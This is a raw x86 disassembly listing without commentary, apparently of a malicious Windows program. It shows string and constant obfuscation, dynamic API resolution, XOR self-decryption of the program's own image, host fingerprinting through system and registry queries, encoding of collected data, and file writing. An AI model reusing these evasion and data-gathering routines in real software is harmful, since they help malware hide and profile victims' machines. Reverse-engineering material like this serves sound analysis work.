call sub_41E5D3
call sub_41BBB0
mov esi, eax
loc_421052: ; CODE XREF: .data:004210AE�j
call sub_41BB03
mov edx, eax
mov [ebp-144h], dl
movzx eax, byte ptr [ebp-144h]
mov edx, ds:100130A0h
sub edx, 2
cmp eax, edx
jnz short loc_42108A
movsx eax, word ptr ds:100131DCh
add eax, ds:10013194h
sub eax, 9
push eax
call dword ptr ds:10012664h
loc_42108A: ; CODE XREF: .data:00421071�j
movzx eax, byte ptr [ebp-144h]
mov edx, ds:100131F8h
sub edx, 2
cmp eax, edx
jnz short loc_4210B0
mov eax, ds:10013228h
add eax, 61h
push eax
call dword ptr ds:10012630h
pop ecx
jmp short loc_421052
; ---------------------------------------------------------------------------
loc_4210B0: ; CODE XREF: .data:0042109C�j
or esi, esi
jnz loc_42116A
push 10013EF3h
call sub_41E914
mov [ebp-154h], eax
push 10013EE9h
call sub_41E914
push eax
mov edx, [ebp-154h]
push edx
lea edx, [ebp-143h]
push edx
call dword ptr ds:10012634h
lea eax, [ebp-143h]
push eax
push 0
push 0
call dword ptr ds:1001261Ch
mov ebx, eax
push 10013EDDh
call sub_41E914
mov [ebp-158h], eax
push 10013ED3h
call sub_41E914
mov edx, ds:10013234h
add edx, ds:1001323Ch
sub edx, 7
push edx
push eax
mov edx, [ebp-158h]
push edx
lea edx, [ebp-143h]
push edx
call dword ptr ds:10012634h
add esp, 2Ch
lea eax, [ebp-143h]
push eax
push 0
push 0
call dword ptr ds:1001261Ch
mov ebx, eax
or ebx, ebx
jnz short loc_42116A
movsx eax, word ptr ds:100130CCh
add eax, ds:10013138h
sub eax, 6
push eax
call dword ptr ds:10012664h
loc_42116A: ; CODE XREF: .data:004210B2�j
; .data:00421151�j
push 0
call dword ptr ds:1000F5E8h
mov edi, eax
push 10013EC9h
call sub_41E914
mov [ebp-20h], eax
mov [ebp-34h], edi
lea eax, ds:10007BECh
mov [ebp-40h], eax
push 7F00h
push 0
call dword ptr ds:10010220h
mov [ebp-2Ch], eax
push 7F03h
push 0
call dword ptr ds:10012620h
mov [ebp-30h], eax
and dword ptr [ebp-24h], 0
push 0
call dword ptr ds:1000E120h
mov [ebp-28h], eax
mov dword ptr [ebp-44h], 3
mov eax, ds:100131C4h
add eax, ds:1001319Ch
sub eax, 0Bh
mov [ebp-3Ch], eax
mov eax, ds:10013108h
movsx edx, word ptr ds:100130FCh
add eax, edx
sub eax, 0Ch
mov [ebp-38h], eax
lea eax, [ebp-44h]
push eax
call dword ptr ds:1000F0DCh
push 10013EBFh
call sub_41E914
mov [ebp-15Ch], eax
push 10013EB5h
call sub_41E914
push 0
push edi
push 0
push 0
mov edx, ds:10013228h
add edx, ds:100131D8h
sub edx, 0Ch
push edx
movsx edx, word ptr ds:10013124h
sub edx, 6
push edx
mov edx, ds:10013214h
mov ecx, edx
sub ecx, 9
push ecx
movsx ecx, word ptr ds:100130E0h
dec ecx
push ecx
push 0CA0000h
push eax
mov ecx, [ebp-15Ch]
push ecx
mov ecx, ds:10013254h
add ecx, edx
mov edx, ecx
sub edx, 12h
push edx
call dword ptr ds:1001164Ch
mov ds:1000F610h, eax
lea eax, [ebp-148h]
push eax
push edi
call sub_42152F
add esp, 14h
mov [ebp-14Ch], eax
mov ds:10012610h, eax
mov eax, [ebp-148h]
mov ds:1000F614h, eax
or esi, esi
jnz short loc_4212AD
call sub_41BF76
mov eax, ds:10013090h
add eax, ds:10013110h
sub eax, 8
mov ds:10012638h, eax
jmp short loc_4212C6
; ---------------------------------------------------------------------------
loc_4212AD: ; CODE XREF: .data:00421291�j
movsx eax, word ptr ds:100130C0h
mov edx, ds:10013220h
lea eax, [eax+edx+3A92h]
mov ds:10012638h, eax
loc_4212C6: ; CODE XREF: .data:004212AB�j
lea eax, [ebp-150h]
push eax
mov eax, ds:100131D8h
add eax, ds:100130DCh
sub eax, 0Ch
push eax
push 0
push 100029CBh
mov eax, ds:1001321Ch
add eax, ds:10013224h
sub eax, 0Dh
push eax
push 0
call dword ptr ds:10012B90h
push eax
call dword ptr ds:10011654h
or esi, esi
jnz short loc_421325
call sub_41BF88
call sub_41FABE
jmp short loc_421325
; ---------------------------------------------------------------------------
loc_421311: ; CODE XREF: .data:00421347�j
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:1001277Ch
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:1000D050h
loc_421325: ; CODE XREF: .data:00421303�j
; .data:0042130F�j
movsx eax, word ptr ds:10013174h
sub eax, 7
push eax
mov eax, ds:10013134h
sub eax, 8
push eax
push 0
lea eax, [ebp-1Ch]
push eax
call dword ptr ds:10011630h
or eax, eax
jnz short loc_421311
pop edi
pop esi
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
dd 4001B8h, 8C280h
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 10012784h
call dword ptr ds:1000FA3Ch
mov eax, ds:10012784h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
sub_42136F proc near ; CODE XREF: .data:00422EA7�p
push edi
push 10013EA7h
call sub_41E914
pop ecx
push eax
call dword ptr ds:1000F5E8h
mov ds:10013298h, eax
test eax, eax
jnz short loc_4213A2
push 10013E99h
call sub_41E914
pop ecx
push eax
call dword ptr ds:10010244h
mov ds:10013298h, eax
loc_4213A2: ; CODE XREF: sub_42136F+1A�j
push 10013E8Fh
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:10012630h, eax
push 10013E84h
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1000D030h, eax
push 10013E7Ch
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1000D054h, eax
push 10013E74h
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1000FA38h, eax
push 10013E6Ah
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1000FA2Ch, eax
push 10013E60h
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1001264Ch, eax
push 10013E56h
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:10011638h, eax
push 10013E4Ch
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:10011644h, eax
push 10013E44h
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:10012BACh, eax
push 10013E3Bh
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:10012600h, eax
push 10013E31h
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1000D020h, eax
push 10013E26h
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:10012634h, eax
push 10013E1Ah
call sub_41E914
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1001024Ch, eax
push 10013E10h
call sub_41E914
add esp, 38h
push eax
push dword ptr ds:10013298h
call dword ptr ds:1000F1F8h
mov ds:1000F1F4h, eax
pop edi
retn
sub_42136F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42152F proc near ; CODE XREF: .data:00421271�p
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov eax, [ebp+arg_0]
mov esi, [eax+3Ch]
mov ecx, esi
add ecx, eax
mov eax, [ecx+28h]
mov edx, [ebp+arg_0]
lea esi, [eax+edx+0Dh]
movzx eax, byte ptr [esi]
xor eax, 4Dh
mov [ebp+var_1], al
movzx eax, byte ptr [esi+1]
mov edx, ds:1001318Ch
add edx, 200h
mov ebx, eax
imul ebx, edx
mov eax, ds:100130ECh
mov ecx, eax
add ecx, ds:1001309Ch
sub ecx, 7
jmp short loc_421587
; ---------------------------------------------------------------------------
loc_421579: ; CODE XREF: sub_42152F+5A�j
movzx eax, byte ptr [esi+ecx]
movzx edx, [ebp+var_1]
xor eax, edx
mov [esi+ecx], al
inc ecx
loc_421587: ; CODE XREF: sub_42152F+48�j
cmp ecx, ebx
jb short loc_421579
mov eax, [ebp+arg_4]
mov [eax], ebx
mov eax, esi
pop esi
pop ebx
leave
retn
sub_42152F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421596 proc near ; CODE XREF: sub_41BF88+AB�p
var_1AC = dword ptr -1ACh
var_1A8 = byte ptr -1A8h
var_1A4 = dword ptr -1A4h
var_1A0 = dword ptr -1A0h
var_19C = byte ptr -19Ch
var_198 = dword ptr -198h
var_193 = dword ptr -193h
var_18F = dword ptr -18Fh
var_18B = dword ptr -18Bh
var_187 = dword ptr -187h
var_183 = dword ptr -183h
var_FF = byte ptr -0FFh
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1ACh
push esi
push edi
mov edi, [ebp+arg_0]
mov byte ptr [edi], 0
mov [ebp+var_193], 94h
lea eax, [ebp+var_193]
push eax
call dword ptr ds:10012B98h
cmp [ebp+var_183], 1
jnz short loc_4215DC
push 10013E0Ah
call sub_41E914
push eax
push edi
call dword ptr ds:1000D020h
add esp, 0Ch
loc_4215DC: ; CODE XREF: sub_421596+2F�j
cmp [ebp+var_183], 2
jnz short loc_4215FA
push 10013E04h
call sub_41E914
push eax
push edi
call dword ptr ds:10012634h
add esp, 0Ch
loc_4215FA: ; CODE XREF: sub_421596+4D�j
push 10013DF8h
call sub_41E914
push [ebp+var_187]
push [ebp+var_18B]
push [ebp+var_18F]
push eax
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10012634h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D020h
push 10013DF1h
call sub_41E914
mov esi, ds:10013244h
sub esi, 4
push esi
push 0
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_19C]
push esi
lea esi, [ebp+var_198]
push esi
push 0FFh
lea esi, [ebp+var_FF]
push esi
push eax
call dword ptr ds:10012614h
push 10013DE9h
call sub_41E914
push [ebp+var_198]
push eax
lea esi, [ebp+var_FF]
push esi
call dword ptr ds:10012634h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D020h
push 0FFh
lea eax, [ebp+var_FF]
push eax
movsx eax, word ptr ds:1001324Ch
movsx edx, word ptr ds:100131E0h
add eax, edx
sub eax, 9
push eax
push 400h
call dword ptr ds:1000F5F8h
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D020h
push 10013DE4h
call sub_41E914
push eax
push edi
call dword ptr ds:1000D020h
mov [ebp+var_1A0], 0FFh
push 10013DB7h
call sub_41E914
mov [ebp+var_1AC], eax
push 10013DAAh
call sub_41E914
lea esi, [ebp+var_1A8]
push esi
lea esi, [ebp+var_1A0]
push esi
lea esi, [ebp+var_FF]
push esi
push eax
mov esi, [ebp+var_1AC]
push esi
push 80000002h
call sub_41E7DB
add esp, 70h
mov [ebp+var_1A4], eax
mov eax, ds:1001315Ch
sub eax, 8
cmp [ebp+var_1A4], eax
jnz short loc_42175C
lea eax, [ebp+var_FF]
push eax
push edi
call dword ptr ds:1000D020h
add esp, 8
loc_42175C: ; CODE XREF: sub_421596+1B3�j
pop edi
pop esi
leave
retn
sub_421596 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421760 proc near ; CODE XREF: sub_41BF88+C7�p
; sub_41D354+3D1�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
push edi
mov ebx, [ebp+arg_0]
mov esi, ds:100131D4h
sub esi, 2
jmp short loc_4217A8
; ---------------------------------------------------------------------------
loc_421774: ; CODE XREF: sub_421760+4B�j
call dword ptr ds:10012BACh
movsx edi, word ptr ds:1001322Ch
mov edx, ds:10013214h
lea edi, [edi+edx+51h]
mov edx, 10624DD3h
push ecx
mov ecx, eax
imul edx
sar edx, 7
sar ecx, 1Fh
sub edx, ecx
mov eax, edx
pop ecx
add edi, eax
mov edx, edi
mov [ebx+esi], dl
inc esi
loc_4217A8: ; CODE XREF: sub_421760+12�j
cmp esi, [ebp+arg_4]
jl short loc_421774
mov eax, [ebp+arg_4]
mov edx, ds:10013190h
sub edx, 2
mov [ebx+eax], dl
mov eax, ebx
pop edi
pop esi
pop ebx
pop ebp
retn
sub_421760 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 118h
push ebx
push esi
push edi
movsx eax, word ptr ds:100131F0h
sub eax, 3
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_4217F5
push 1000F0F0h
lea eax, [ebp-110h]
push eax
call sub_425399
jmp short loc_421806
; ---------------------------------------------------------------------------
loc_4217F5: ; CODE XREF: .data:004217E0�j
push 10010260h
lea eax, [ebp-110h]
push eax
call sub_425399
loc_421806: ; CODE XREF: .data:004217F3�j
push 0
movsx eax, word ptr ds:10013160h
dec eax
push eax
push 4
push 0
mov eax, ds:1001318Ch
movsx edx, word ptr ds:10013240h
add eax, edx
sub eax, 2
push eax
push 40000000h
lea eax, [ebp-110h]
push eax
call dword ptr ds:10012788h
mov [ebp-8], eax
push 2
push 0
mov eax, ds:100131A0h
add eax, ds:10013210h
sub eax, 4
push eax
push dword ptr [ebp-8]
call dword ptr ds:10012B9Ch
push 10013DA2h
call sub_41E914
pop ecx
push 0
lea edx, [ebp-0Ch]
push edx
movsx edx, word ptr ds:100130B0h
movsx ecx, word ptr ds:100131B4h
add edx, ecx
sub edx, 7
push edx
push eax
push dword ptr [ebp-8]
call dword ptr ds:10012B8Ch
push 493E0h
push 40h
call dword ptr ds:1000FA34h
mov ebx, eax
push 61A80h
push 40h
call dword ptr ds:1000FA34h
mov esi, eax
mov eax, ds:100131BCh
sub eax, 9
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_4218C3
mov eax, [ebp+8]
inc eax
push eax
push ebx
call sub_425399
jmp short loc_4218CC
; ---------------------------------------------------------------------------
loc_4218C3: ; CODE XREF: .data:004218B4�j
push dword ptr [ebp+8]
push ebx
call sub_425399
loc_4218CC: ; CODE XREF: .data:004218C1�j
mov ecx, ebx
or eax, 0FFFFFFFFh
loc_4218D1: ; CODE XREF: .data:004218D6�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4218D1
mov [ebp-4], eax
mov edi, ds:1001328Ch
sub edi, 6
jmp short loc_42190C
; ---------------------------------------------------------------------------
loc_4218E6: ; CODE XREF: .data:0042190F�j
movzx eax, byte ptr [ebx+edi]
mov [ebp-114h], eax
mov eax, edi
mul edi
mov [ebp-118h], eax
mov eax, [ebp-114h]
mov edx, [ebp-118h]
add eax, edx
mov [ebx+edi], al
inc edi
loc_42190C: ; CODE XREF: .data:004218E4�j
cmp edi, [ebp-4]
jb short loc_4218E6
mov eax, ds:100130C4h
add eax, 61A79h
push eax
push esi
push dword ptr [ebp-4]
push ebx
call sub_41D22D
add esp, 10h
movsx eax, word ptr ds:10013260h
mov edi, eax
add edi, ds:10013224h
sub edi, 7
jmp short loc_421952
; ---------------------------------------------------------------------------
loc_42193D: ; CODE XREF: .data:00421960�j
cmp byte ptr [esi+edi], 2Bh
jnz short loc_421947
mov byte ptr [esi+edi], 28h
loc_421947: ; CODE XREF: .data:00421941�j
cmp byte ptr [esi+edi], 3Dh
jnz short loc_421951
mov byte ptr [esi+edi], 29h
loc_421951: ; CODE XREF: .data:0042194B�j
inc edi
loc_421952: ; CODE XREF: .data:0042193B�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_421957: ; CODE XREF: .data:0042195C�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_421957
cmp edi, eax
jb short loc_42193D
mov eax, ds:1001312Ch
sub eax, 8
mov edx, [ebp+8]
cmp byte ptr [edx+eax], 4Bh
jnz short loc_4219A3
push 10013D9Dh
call sub_41E914
add esp, 4
push 0
lea edi, [ebp-0Ch]
push edi
mov edi, ds:10013244h
movsx edx, word ptr ds:100130B0h
add edi, edx
sub edi, 0Ah
push edi
push eax
push dword ptr [ebp-8]
call dword ptr ds:10012B8Ch
loc_4219A3: ; CODE XREF: .data:00421971�j
mov ecx, esi
or eax, 0FFFFFFFFh
loc_4219A8: ; CODE XREF: .data:004219AD�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_4219A8
push 0
lea edx, [ebp-0Ch]
push edx
mov edx, ds:10013110h
add edx, ds:10013238h
sub edx, 4
mov edi, eax
add edi, edx
push edi
push esi
push dword ptr [ebp-8]
call dword ptr ds:10012B8Ch
push dword ptr [ebp-8]
call dword ptr ds:10011654h
push ebx
call dword ptr ds:1000F61Ch
push esi
call dword ptr ds:1000F61Ch
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4219EF proc near ; CODE XREF: sub_41BF76+2�p
; sub_41BF76+9�p
var_104 = byte ptr -104h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 104h
push edi
lea eax, [ebp+var_104]
push eax
mov eax, ds:100131D0h
sub eax, 7
push eax
push 0
push [ebp+arg_0]
push 0
call dword ptr ds:1000FA44h
mov edi, eax
or edi, edi
jnz short loc_421A47
push 10013D98h
call sub_41E914
push eax
lea edi, [ebp+var_104]
push edi
call dword ptr ds:1000D020h
push 1
push 43h
lea eax, [ebp+var_104]
push eax
call sub_41F764
add esp, 18h
loc_421A47: ; CODE XREF: sub_4219EF+2B�j
pop edi
leave
retn
sub_4219EF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421A4A proc near ; CODE XREF: .data:0041BD60�p
; sub_41FABE+17A�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push eax
push ebx
push esi
push edi
mov eax, ds:1001326Ch
movsx edx, word ptr ds:10013118h
mov esi, eax
add esi, edx
sub esi, 0Ch
lea eax, [ebp+var_4]
push eax
push 10014A38h
mov eax, [ebp+arg_0]
push eax
mov ebx, [eax]
call dword ptr ds:0[ebx]
mov edi, eax
mov eax, ds:100131D4h
sub eax, 2
cmp edi, eax
jz short loc_421A8D
xor eax, eax
jmp short loc_421AEB
; ---------------------------------------------------------------------------
loc_421A8D: ; CODE XREF: sub_421A4A+3D�j
lea eax, [ebp+var_8]
push eax
push [ebp+arg_8]
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+10h]
mov edi, eax
mov eax, ds:100130B8h
sub eax, 3
cmp edi, eax
jnz short loc_421AE0
push [ebp+arg_C]
push [ebp+arg_4]
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+14h]
mov edi, eax
mov eax, ds:100131CCh
add eax, ds:10013284h
sub eax, 0Fh
cmp edi, eax
jnz short loc_421AD7
mov esi, ds:10013244h
sub esi, 3
loc_421AD7: ; CODE XREF: sub_421A4A+82�j
mov eax, [ebp+var_8]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
loc_421AE0: ; CODE XREF: sub_421A4A+5F�j
mov eax, [ebp+var_4]
push eax
mov ebx, [eax]
call dword ptr [ebx+8]
mov eax, esi
loc_421AEB: ; CODE XREF: sub_421A4A+41�j
pop edi
pop esi
pop ebx
leave
retn
sub_421A4A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421AF0 proc near ; CODE XREF: sub_41FF98+463�p
; sub_41FF98+47F�p
var_FFF = byte ptr -0FFFh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 1000h
call sub_425379
push ebx
push esi
push edi
push 5
push [ebp+arg_0]
call dword ptr ds:1000D004h
mov edi, eax
loc_421B0D: ; CODE XREF: sub_421AF0+7D�j
or edi, edi
jnz short loc_421B15
xor eax, eax
jmp short loc_421B6F
; ---------------------------------------------------------------------------
loc_421B15: ; CODE XREF: sub_421AF0+1F�j
push 0FFFh
lea eax, [ebp+var_FFF]
push eax
push edi
call dword ptr ds:1000E010h
movsx eax, word ptr ds:10013144h
sub eax, 5
push eax
push [ebp+arg_4]
lea eax, [ebp+var_FFF]
push eax
call sub_41A8C2
add esp, 0Ch
movsx esi, word ptr ds:10013124h
movsx ebx, word ptr ds:10013170h
lea esi, [esi+ebx+0FFF7h]
cmp eax, esi
jz short loc_421B62
mov eax, edi
jmp short loc_421B6F
; ---------------------------------------------------------------------------
loc_421B62: ; CODE XREF: sub_421AF0+6C�j
push 2
push edi
call dword ptr ds:1000D004h
mov edi, eax
jmp short loc_421B0D
; ---------------------------------------------------------------------------
loc_421B6F: ; CODE XREF: sub_421AF0+23�j
; sub_421AF0+70�j
pop edi
pop esi
pop ebx
leave
retn
sub_421AF0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421B74 proc near ; CODE XREF: sub_41A999+209�p
; sub_41A999+220�p ...
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
cmp dword ptr ds:10013290h, 0
jnz short loc_421B9C
push 10012BC0h
call dword ptr ds:1000E008h
mov dword ptr ds:10013290h, 1
loc_421B9C: ; CODE XREF: sub_421B74+11�j
mov esi, ds:100131D8h
sub esi, 3
movzx ebx, byte ptr [edi]
movzx edx, byte ptr [edi+2]
movzx edx, dx
shl edx, 8
or ebx, edx
movzx ebx, bx
movsx edx, word ptr ds:100130BCh
sub edx, 7
imul ebx, edx
add esi, ebx
mov [ebp+var_4], si
movzx eax, [ebp+var_4]
mov edx, ds:100130ACh
add edx, 5
cmp eax, edx
jz loc_421C5F
push 10012BC0h
call dword ptr ds:10012660h
mov eax, ds:10013110h
inc eax
mov [ebp+var_2], ax
jmp short loc_421C1A
; ---------------------------------------------------------------------------
loc_421BF6: ; CODE XREF: sub_421B74+B0�j
movzx eax, [ebp+var_2]
add eax, edi
movsx edx, byte ptr [eax]
movsx ecx, byte ptr [edi+4]
xor edx, ecx
mov [eax], dl
movzx eax, [ebp+var_2]
mov edx, ds:1001309Ch
sub edx, 3
add eax, edx
mov [ebp+var_2], ax
loc_421C1A: ; CODE XREF: sub_421B74+80�j
movzx eax, [ebp+var_2]
movzx edx, [ebp+var_4]
cmp eax, edx
jl short loc_421BF6
mov eax, ds:100131F8h
sub eax, 3
mov edx, ds:10013258h
sub edx, 2
mov [edi+eax], dl
mov eax, ds:1001321Ch
add eax, ds:10013114h
sub eax, 0Eh
mov edx, ds:10013128h
sub edx, 9
mov [edi+eax], dl
push 10012BC0h
call dword ptr ds:10011650h
loc_421C5F: ; CODE XREF: sub_421B74+65�j
lea eax, [edi+6]
pop edi
pop esi
pop ebx
leave
retn
sub_421B74 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421C67 proc near ; CODE XREF: sub_41DD8F+24�p
; sub_41FCEB+25�p ...
var_10C = dword ptr -10Ch
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push edi
mov edi, [ebp+arg_0]
push 104h
lea eax, [ebp+var_108]
push eax
call dword ptr ds:1000F600h
mov eax, ds:1001314Ch
movsx edx, word ptr ds:10013264h
sub edx, 9
mov byte ptr [ebp+eax+var_10C+1], dl
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_10C]
push eax
push 104h
lea eax, [ebp+var_108]
push eax
lea eax, [ebp+var_108]
push eax
call dword ptr ds:10012614h
push 10013D90h
call sub_41E914
push [ebp+var_10C]
push eax
push edi
call dword ptr ds:10012634h
add esp, 10h
mov eax, ds:100131D0h
add eax, ds:10013184h
sub eax, 9
mov [ebp+var_4], eax
jmp short loc_421D2D
; ---------------------------------------------------------------------------
loc_421CFE: ; CODE XREF: sub_421C67+D3�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 30h
jl short loc_421D14
cmp al, 39h
jg short loc_421D14
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 31h
loc_421D14: ; CODE XREF: sub_421C67+9F�j
; sub_421C67+A3�j
mov eax, [ebp+var_4]
mov al, [edi+eax]
cmp al, 41h
jl short loc_421D2A
cmp al, 5Ah
jg short loc_421D2A
mov eax, [ebp+var_4]
add eax, edi
add byte ptr [eax], 20h
loc_421D2A: ; CODE XREF: sub_421C67+B5�j
; sub_421C67+B9�j
inc [ebp+var_4]
loc_421D2D: ; CODE XREF: sub_421C67+95�j
movsx eax, word ptr ds:100131F0h
add eax, 5
cmp [ebp+var_4], eax
jb short loc_421CFE
pop edi
leave
retn
sub_421C67 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_421D3F proc near ; CODE XREF: sub_41D22D+3C�p
; sub_41D22D+C4�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov eax, [ebp+arg_0]
movzx ebx, byte ptr [eax]
movsx eax, word ptr ds:100130BCh
mov edx, ds:10013234h
lea eax, [eax+edx+0F3h]
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+1]
add ebx, eax
movsx eax, word ptr ds:10013218h
add eax, 0FBh
imul ebx, eax
mov eax, [ebp+arg_0]
movzx eax, byte ptr [eax+2]
add ebx, eax
mov eax, ds:10013280h
movsx edx, word ptr ds:100131B4h
mov esi, eax
add esi, edx
sub esi, 8
jmp short loc_421DEA
; ---------------------------------------------------------------------------
loc_421D99: ; CODE XREF: sub_421D3F+B5�j
movsx edi, word ptr ds:10013208h
add edi, ds:10013224h
sub edi, 7
sub edi, esi
mov edx, [ebp+arg_4]
mov [ebp+var_4], edx
mov edx, ebx
and edx, 8000003Fh
jge short loc_421DC0
dec edx
or edx, 0FFFFFFC0h
inc edx
loc_421DC0: ; CODE XREF: sub_421D3F+7A�j
mov ecx, ds:100132BCh
mov dl, [ecx+edx]
mov ecx, [ebp+var_4]
mov [ecx+edi], dl
mov eax, ebx
mov edi, ds:1001317Ch
add edi, 34h
mov ecx, edi
add ecx, ds:100130F4h
cdq
idiv ecx
mov ebx, eax
add esi, 1
loc_421DEA: ; CODE XREF: sub_421D3F+58�j
movsx eax, word ptr ds:10013208h
dec eax
cmp esi, eax
jl short loc_421D99
pop edi
pop esi
pop ebx
leave
retn
sub_421D3F endp
; ---------------------------------------------------------------------------
db 0B8h
dd 80004001h
db 0C2h, 10h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 230h
push ebx
push esi
push edi
mov esi, [ebp+8]
mov ebx, [ebp+0Ch]
mov eax, ebx
cmp eax, 100h
jz short loc_421E34
jl loc_422372
cmp eax, 111h
jz loc_421EC5
jmp loc_422372
; ---------------------------------------------------------------------------
loc_421E34: ; CODE XREF: .data:00421E1C�j
cmp dword ptr [ebp+10h], 9
jnz loc_422372
mov edi, ds:1001315Ch
sub edi, 9
jmp short loc_421EB4
; ---------------------------------------------------------------------------
loc_421E49: ; CODE XREF: .data:00421EBE�j
mov eax, 30h
mul edi
mov [ebp-208h], eax
cmp ds:10010380h[eax], esi
jnz short loc_421E7E
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
push dword ptr ds:10010384h[eax]
call dword ptr ds:1000FA40h
jmp loc_422372
; ---------------------------------------------------------------------------
loc_421E7E: ; CODE XREF: .data:00421E5D�j
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
cmp ds:10010384h[eax], esi
jnz short loc_421EB3
mov eax, 30h
mul edi
mov [ebp-210h], eax
push dword ptr ds:10010388h[eax]
call dword ptr ds:1000FA40h
jmp loc_422372
; ---------------------------------------------------------------------------
loc_421EB3: ; CODE XREF: .data:00421E92�j
inc edi
loc_421EB4: ; CODE XREF: .data:00421E47�j
mov eax, ds:10013258h
add eax, 62h
cmp edi, eax
jb short loc_421E49
jmp loc_422372
; ---------------------------------------------------------------------------
loc_421EC5: ; CODE XREF: .data:00421E29�j
mov eax, ds:10013134h
mov edi, eax
add edi, ds:10013224h
sub edi, 0Dh
jmp short loc_421EF1
; ---------------------------------------------------------------------------
loc_421ED7: ; CODE XREF: .data:00421F04�j
mov eax, 30h
mul edi
mov [ebp-208h], eax
mov eax, ds:1001038Ch[eax]
cmp [ebp+14h], eax
jz short loc_421F06
inc edi
loc_421EF1: ; CODE XREF: .data:00421ED5�j
movsx eax, word ptr ds:10013264h
mov edx, ds:10013288h
lea eax, [eax+edx+55h]
cmp edi, eax
jb short loc_421ED7
loc_421F06: ; CODE XREF: .data:00421EEE�j
mov eax, ds:10013258h
add eax, 5Eh
movsx edx, word ptr ds:10013180h
add eax, edx
cmp edi, eax
jz loc_422372
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-20Ch], eax
push dword ptr ds:10010378h[eax]
call dword ptr ds:10012BA4h
movsx eax, word ptr ds:10013124h
mov byte ptr [ebp+eax-20Ah], 4Bh
mov eax, ds:100130F8h
mov edx, ds:1001321Ch
sub edx, 8
mov [ebp+eax-20Ah], dl
lea eax, [ebp-103h]
push eax
lea eax, [ebp-204h]
push eax
call dword ptr ds:1000D020h
add esp, 8
push 0FFh
lea eax, [ebp-103h]
push eax
mov eax, 30h
mul edi
mov [ebp-210h], eax
push dword ptr ds:10010380h[eax]
call dword ptr ds:10012BA4h
mov eax, ds:100130F8h
add eax, ds:10013268h
